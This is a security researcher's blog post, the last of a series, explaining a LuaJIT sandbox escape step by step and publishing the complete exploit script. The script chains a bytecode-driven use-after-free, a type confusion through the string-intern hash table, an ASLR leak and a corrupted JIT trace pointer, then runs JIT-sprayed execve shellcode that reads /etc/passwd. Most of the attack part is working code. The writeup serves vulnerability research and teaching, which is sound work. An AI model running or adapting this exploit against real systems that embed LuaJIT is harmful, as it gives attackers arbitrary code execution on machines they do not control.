LuaJIT Sandbox Escape: The Saga Ends
Happy holidays 🕎/🎅 and (almost) happy new year! This week I presented my LuaJIT journey at the DEFCON-Groups meetup(@dc9723):
Yesterday I shared my LuaJIT journey at @dc9723 group. Thanks for everyone who attended :D
— faulty *ptrrr (@0x_shaq) December 28, 2022
Currently working on the last blogpost of the series, which documents the exploit dev part+the thinking process behind every step I showed in the slides. Should be published soon pic.twitter.com/pKIXzSuVFI
The slides included a summary of the 3-part blog series I published in this blog. However, there was a 4th part I still didn’t publish here and was included in the presentation. So, here it is, part 4: Crafting a fully-weaponized sandbox escape for LuaJIT! :D
Side-Note: The talk was not recorded / I didn’t publish the slides(yet, sorry). However, this blogpost is a great summary of the entire talk + it documents some technical stuff in more depth.
Exploit plan
The plan is as follows:
- JIT-Spray your shellcode(explained in part3 of this series).
- Achieve Use-After-Free
- Leverage the UAF to get a Type-Confusion
- Get leaks: Defeat ASLR
- Find
GCtrace->mcode
pointer, overwrite its value - Jump to shellcode
Let’s go!
Use-After-Free
By default, Lua(JIT) allows you to load already-compiled Lua bytecode. This bytecode is not verified as it is considered ‘trusted’, and you can cook alot of powerful primitives by loading a specially-crafted bytecode. Previously, this mechanism was researched by Samuel Groß(@5aelo, Project Zero) in this writeup. In his blogpost, Samuel demonstrates how to leverage the LOADK
instruction of Lua to load a forged TValue
. It involved (a bit odd) heap shaping which I found difficult to re-produce in LuaJIT. Plus, I wanted to come up with my own strategy/exploit, so I decided to go for a MOV
exploit.
In order to achieve UAF with a MOV
instruction we:
- Create a table (i.e:
local tbl = {1337, 'foo', 'bar'}
) MOV
itsTValue
outside the virtual stack frame- Set it to
nil
to make theGCtab
object un-reachable from the GC root - call
collectgarbage()
And now we have a TValue
on the virtual stack, pointing to a free’d GCtab
object.
The reason we get a UAF out of the steps above is the way the Garbage Collector decides to free memory: The LuaJIT’s GC(which is based on Lua 5.1) has a Tri-Color Mark-and-Sweep algorithm. Essentially, whenever the GC traverse through the objects and mark them as grey/black it scans through the virtual stack, starting from the bottom(lua_State::stack
) all the way to the top of the stack(lua_State::top
):
static void gc_traverse_thread(global_State *g, lua_State *th)
{
TValue *o, *top = th->top;
for (o = tvref(th->stack)+1+LJ_FR2; o < top; o++)
gc_marktv(g, o); // <------ mark the object
/*...*/
}
Hence, if we MOV
a TValue
outside of the stack(above L->top
) and call trigger the garbage collector(using collectgarbage()
) the GCtab
object pointed by this TValue
will never get marked ➜ as a result, it will be free’d during the sweep phase.
What the Garbage Collector doesn’t know is that we have another copy of this TValue
, waiting for us to move it back to our Lua context after the GC collection ends :) And that’s the logic behind how to achieve UAF with MOV
.
At this point, the TValue
is outside of the stack so we don’t have access to it in the context of our Lua script, but it shouldn’t be a problem to get it back to our script: we’ll just use RET <Our_TValue_idx>
. This is exactly what exp-gen.py does when we prepare our exploit.
Type Confusion
The road to get a Type-Confusion was a bit difficult, and required some fancy engineering behind it as it was difficult to find the right structures/overlapping. But eventually I got it.
Before we get into the details, let’s set a goal: Our goal is to get a Lua table of type GCtab
with a very large size(GCtab::asize
) in order to get OOB r/w, and from there we’ll build our way up to a full code execution.
The data structures I chose to confuse are GCtab
and the array of pointers pointed by global_State::strhash
. But before we dive into this, we’ll need to know what global_State::strhash
is used for and what exactly is String Interning.
Some Background on String Interning
LuaJIT implements String Interning:
In computer science, string interning is a method of storing only one copy of each distinct string value, which must be immutable. Interning strings makes some string processing tasks more time- or space-efficient at the cost of requiring more time when the string is created or interned. The distinct values are stored in a string intern pool. (Source: wikipedia)
In other words, LuaJIT maintains a hash-table pointed by global_State::strhash
. This hash-table contains all of the string objects(GCstr
) of a Lua program.
Every time a new string allocation request is made, a hash is calculated in order to determine whether this string has been already interned or not:
GCstr *lj_str_new(lua_State *L, const char *str, size_t lenx)
{
/* ... */
/* Compute string hash. Constants taken from lookup3 hash by Bob Jenkins. */
if (len >= 4) { /* Caveat: unaligned access! */
a = lj_getu32(str);
h ^= lj_getu32(str+len-4);
b = lj_getu32(str+(len>>1)-2);
h ^= b; h -= lj_rol(b, 14);
b += lj_getu32(str+(len>>2)-1);
} else if (len > 0) {
a = *(const uint8_t *)str;
h ^= *(const uint8_t *)(str+len-1);
b = *(const uint8_t *)(str+(len>>1));
h ^= b; h -= lj_rol(b, 14);
} else {
return &g->strempty;
}
a ^= h; a -= lj_rol(h, 11);
b ^= a; b -= lj_rol(a, 25);
h ^= b; h -= lj_rol(b, 16);
/* Check if the string has already been interned. */
o = gcref(g->strhash[h & g->strmask]);
if (LJ_LIKELY((((uintptr_t)str+len-1) & (LJ_PAGESIZE-1)) <= LJ_PAGESIZE-4)) {
while (o != NULL) {
GCstr *sx = gco2str(o);
if (sx->len == len && str_fastcmp(str, strdata(sx), len) == 0) {
/* Resurrect if dead. Can only happen with fixstring() (keywords). */
if (isdead(g, o)) flipwhite(o);
return sx; /* Return existing string. */
}
o = gcnext(o);
}
}
/* ... */
}
However, if the string is unique/not already exists in the hash-table, a new allocation will be made. The interesting part here is what’s happening after the allocation of the new GCstr
object:
if (g->strnum++ > g->strmask) /* Allow a 100% load factor. */
lj_str_resize(L, (g->strmask<<1)+1); /* Grow string table. */
If the string hash-table is too big, it will relocate. This part caught my attention, and led me to the creation of the final, successful Type-Confusion PoC(below)
Hash-table hacking
In order to create an overlap/type-confusion between the global_State::strhash
hash-table and the UAF’d GCtab
object we have to do the following steps:
And in order to populate the GCtab::asize
field(which determine how big is the array/Lua table) we’ll need to occupy the 6th index of the global_State::strhash
hash-table. To do that, I made a tiny C program that brute-forces possible options:
$ ./calc_hash
...
hash: 0x3ca5d406, idx=0x6, string=xmw
hash: 0xb3da6806, idx=0x6, string=osw
hash: 0x5fcb7806, idx=0x6, string=Gvx
...more results...
All we need is to add one of those strings as a constant in our exploit script, and during the hash-table relocation, it will fall right on the 6th index:
Nice! The 6th index is occupied, which makes the asize
field to have a very large value:
+we have a Null-pointer dereference at the GCtab::array
field. This means that we have a relative r/w primitive starting from address 0x0. But hey, wait, if we’re starting from 0x0 that’s not a relative r/w, that’s an arbitrary r/w! To put things more clear: It means that if we print(uaf_tbl[0x40000000]
) the LuaJIT interpreter will print out the value stored in address 0x40000000
!(multiplied by 8, but let’s not focus on that/that’s not an issue. We’ll just divide it by 8 to cancel the multiplication).
Defeating ASLR
I’ll just paste here a screenshot from the presentation, because it really explains everything in a simple way:
Note: here I chose to leak the address of the
require()
function, but you can do it on any other built-in function that has aGCfuncC
object.
Find the mcode pointer
In order to find the GCtrace::mcode
pointer on the heap, we’ll need to find the GG_State
structure on the heap:
struct GG_State {
lua_State L;
global_State g; // g.allocf (function pointer to alloc function, lj_alloc_f)
jit_State J; // J.trace (pointer to GCtrace’s array)
// ...
}
This state object has a function pointer to lj_alloc_f
at g.allocf
, and couple of properties after it: it has the J.trace
pointer, which points to an array that stores all of the GCtrace
objects of our program(==JITed traces).
Using our leaks + arbitrary r/w primitive:
- Calculate the address of
lj_alloc_f
- Scan through the heap in order to find this value
- The moment we find it, it means we found
g.allocf
- Add a fixed offset of
+0x308
(it’s fixed because they are both part of the sameGG_State
structure) to reach theJ.trace
pointer. - Access our JITed trace object -> overwrite its
mcode
value -> win!
-- this will help us to leverage the heap hints/leaks to completly break ASLR
local addrof = function(tval)
local strhex = tostring(tval)
local i = string.find(strhex, '0x')
return tonumber(string.sub(strhex, i+2), 16)
end
-- get C func addr(lj_alloc_f) to break ASLR
local allocf_addr = get_c_func(rw_primitive) - 1.01738e-318 -- 0x32490 is the offset
print('[*] allocf @ ', string.format("0x%x",u64(allocf_addr)))
-- Searching for the `global_State` struct, in order to find the `jit_State` struct (neighbors, both are part of `GG_State`)
local nloop = addrof(require)
print('[*] Finding global_State::allocf ptr... @ ',string.format("0x%x",nloop))
while (nloop>0) do
if(rw_primitive[nloop/8] == allocf_addr) then
break
end
nloop = nloop-8
end
-- Got it, now dereference jit_State->trace[] array
local gcref_arr = rw_primitive[(nloop+0x308-0x8)/8]
print('[*] GCRef array @ ', string.format("0x%x",u64(gcref_arr)))
local idx1, idx2 = u32(rw_primitive[(u64(gcref_arr)+0x10) /8]) -- grab the 4th index
-- Dereference again, in order to reach the `mcode` pointer
local gctrace = rw_primitive[(idx2+0x40) / 8]
print('[*] GCtrace->mcode @ ',string.format("0x%x",u64(gctrace)))
-- Corrupt it
rw_primitive[(idx2+0x40) / 8] = gctrace+9.14e-322 -- adding 0x40 to reach to the `mcode` ptr; incr the ptr to create mis-alignment
print('[*] JITed ptr corrupted! jumping to shellcode :^)\n')
-- profit!
jitted(tbl,'/bin/cat','/etc/passwd')
Full exploit
Below is the full exploit:
https://github.com/0xbigshaq/luajit-pwn/blob/main/sandbox-escape/hax.lua
--[[
This exploit is a sandbox escape for LuaJIT
Download: https://luajit.org/download.html
Author: https://twitter.com/0x_shaq
Tested on:
> ubuntu:20.04
> LuaJIT compiled with default settings(just run `make`)
]]--
local uaf = function()
-- heap grooming #1: Prepare the _string interning_ hash-table
collectgarbage('collect')
local dummy = 123 -- virtual stack
local spray = {}
for i=0x30, (0x13c-18), 1 do
spray[i] = string.rep('pewpew', i)
end
collectgarbage('collect')
-- heap grooming #2: murder the allocator's `dv` chunk
for i=(0x13c), (0x13c-1)+0x200, 1 do
spray[i] = { 1.8457939563e-314, 1.8457939563e-314, 1.8457939563e-314 }
end
-- Achieve UAF primitive
local freed = {
2261634.5098039214,
156842099844.51764,
1.0843961455707782e+16,
7.477080264543605e+20,
5.142912663207646e+25,
}
local mov = freed -- this `MOV` will be hot-patched with OOB by `exp-gen.py`
freed = nil -- Making the `GCtab` unreachable from the GC root
collectgarbage('collect')
-- Type Confusion!
spray[0x30] = spray[0x30] .. 'another concat :D' -- Trigger a relocation of the global string hash table.
return 1337 -- this `RET` will be hot-patched with OOB by `exp-gen.py`
-- Should return the value of the free'd `GCtab` object
end
--[[ ======= exploit begins here ======= ]]--
hash_t = string.upper('Gvx') -- hash-table hacking
local rw_primitive = uaf()
print('[*] UAF + type confusion done :D')
-- preparing JIT-Spray
local jitted = function(t, s, a)
for i=0, 100, 1 do
t[5e-324]=0
t[1e-323]=0
t[1.5e-323]=0
t[2e-323]=0
t[2.5e-323]=0
t[3e-323]=0
t[1.9055771651032652e-193]=0 -- xor rdx, rdx
t[1.8559668824708362e-193]=0 -- add rbp, 0x18
t[1.8494619877878633e-193]=0 -- mov rsi, [rbp]
t[1.8517288554178477e-193]=0 -- sub rsi,0x8
t[1.914498447205438e-193]=0 -- mov rbx, rsi
t[1.8639327969763123e-193]=0 -- mov esi, [esi]
t[1.8538274887895865e-193]=0 -- add rsi,0x10
t[1.8516839145637716e-193]=0 -- add rbx,0x8
t[1.8567088159676176e-193]=0 -- mov ebx, [ebx]
t[1.8538243533811626e-193]=0 -- add rbx,0x10
t[1.849450512851345e-193]=0 -- push 0
t[1.8716972807551464e-193]=0 -- push rbx
t[1.872875119460234e-193]=0 -- mov rdi,rsi; push rdi
t[1.8745776759605808e-193]=0 -- push rsp; pop rsi
t[1.8493391391782406e-193]=0 -- mov eax, 59
t[1.8506931797233557e-193]=0 -- syscall
end
end
-- extra trace for padding purposes in the GCRef traces array
local tbl = {}
for i=0, 100, 1 do
tbl[i]=i
end
-- JIT-Spraying shellcode
print('[*] Creating a hotloop')
jitted(tbl)
print('[*] Done, trace is ready!')
-- ================= <helper funcs> =================
-- this will help us to leverage the heap hints/leaks to completly break ASLR
local addrof = function(tval)
local strhex = tostring(tval)
local i = string.find(strhex, '0x')
return tonumber(string.sub(strhex, i+2), 16)
end
-- unpacking 64bit values (from a floating point double/IEEE-754 to Hex)
local u64 = function(num)
local fixup = 2.3641409746639015e-308 -- 0x11000000000000
num = num + fixup -- dirty hack, sorry
local bytes = {0,0,0,0, 0,0,0,0}
local anum = math.abs(num)
local mantissa, exponent = math.frexp(anum)
exponent = exponent - 1
mantissa = mantissa * 2 - 1
local sign = num ~= anum and 128 or 0
exponent = exponent + 1023
bytes[1] = sign + math.floor(exponent / 2^4)
mantissa = mantissa * 2^4
local currentmantissa = math.floor(mantissa)
mantissa = mantissa - currentmantissa
bytes[2] = (exponent % 2^4) * 2^4 + currentmantissa
for i= 3, 8 do
mantissa = mantissa * 2^8
currentmantissa = math.floor(mantissa)
mantissa = mantissa - currentmantissa
bytes[i] = currentmantissa
end
return tonumber(
string.format('0x%02x%02x%02x%02x%02x%02x',
-- bytes[1],
-- bytes[2],
bytes[3],
bytes[4],
bytes[5],
bytes[6],
bytes[7],
bytes[8]
) ,16)
end
-- unpacking 32bit values (from a floating point double/IEEE-754 to Hex)
local u32 = function(num)
local fixup = 2.3641409746639015e-308 -- 0x11000000000000
num = num + fixup -- dirty hack, sorry
local bytes = {0,0,0,0, 0,0,0,0}
local anum = math.abs(num)
local mantissa, exponent = math.frexp(anum)
exponent = exponent - 1
mantissa = mantissa * 2 - 1
local sign = num ~= anum and 128 or 0
exponent = exponent + 1023
bytes[1] = sign + math.floor(exponent / 2^4)
mantissa = mantissa * 2^4
local currentmantissa = math.floor(mantissa)
mantissa = mantissa - currentmantissa
bytes[2] = (exponent % 2^4) * 2^4 + currentmantissa
for i= 3, 8 do
mantissa = mantissa * 2^8
currentmantissa = math.floor(mantissa)
mantissa = mantissa - currentmantissa
bytes[i] = currentmantissa
end
return 0, tonumber(
string.format('0x%02x%02x%02x%02x',
bytes[5],
bytes[6],
bytes[7],
bytes[8]
) ,16)
end
-- Fetch a function pointer from a `GCfunc` object
local get_c_func = function(rw)
local fcn_ptr = rw[(addrof(require)+0x18) / 0x8] -- GCfuncC->f
return fcn_ptr
end
-- ================= </helper funcs> =================
-- get C func addr(lj_alloc_f) to break ASLR
local allocf_addr = get_c_func(rw_primitive) - 1.01738e-318 -- 0x32490 is the offset
print('[*] allocf @ ', string.format("0x%x",u64(allocf_addr)))
-- Searching for the `global_State` struct, in order to find the `jit_State` struct (neighbors, both are part of `GG_State`)
local nloop = addrof(require)
print('[*] Finding global_State::allocf ptr... @ ',string.format("0x%x",nloop))
while (nloop>0) do
if(rw_primitive[nloop/8] == allocf_addr) then
break
end
nloop = nloop-8
end
-- Got it, now dereference jit_State->trace[] array
local gcref_arr = rw_primitive[(nloop+0x308-0x8)/8]
print('[*] GCRef array @ ', string.format("0x%x",u64(gcref_arr)))
local idx1, idx2 = u32(rw_primitive[(u64(gcref_arr)+0x10) /8]) -- grab the 4th index
-- Dereference again, in order to reach the `mcode` pointer
local gctrace = rw_primitive[(idx2+0x40) / 8]
print('[*] GCtrace->mcode @ ',string.format("0x%x",u64(gctrace)))
-- Corrupt it
rw_primitive[(idx2+0x40) / 8] = gctrace+9.14e-322 -- adding 0x40 to reach to the `mcode` ptr; incr the ptr to create mis-alignment
print('[*] JITed ptr corrupted! jumping to shellcode :^)\n')
-- profit!
jitted(tbl,'/bin/cat','/etc/passwd')
Result:
It was a great journey :D This is the 2nd time I researched about language interpreters internals(the 1st time was with a Zend Engine Research). At this point, I think I’m ready to face my all-time nemesis: Browsers! Stay tuned, and wish me luck.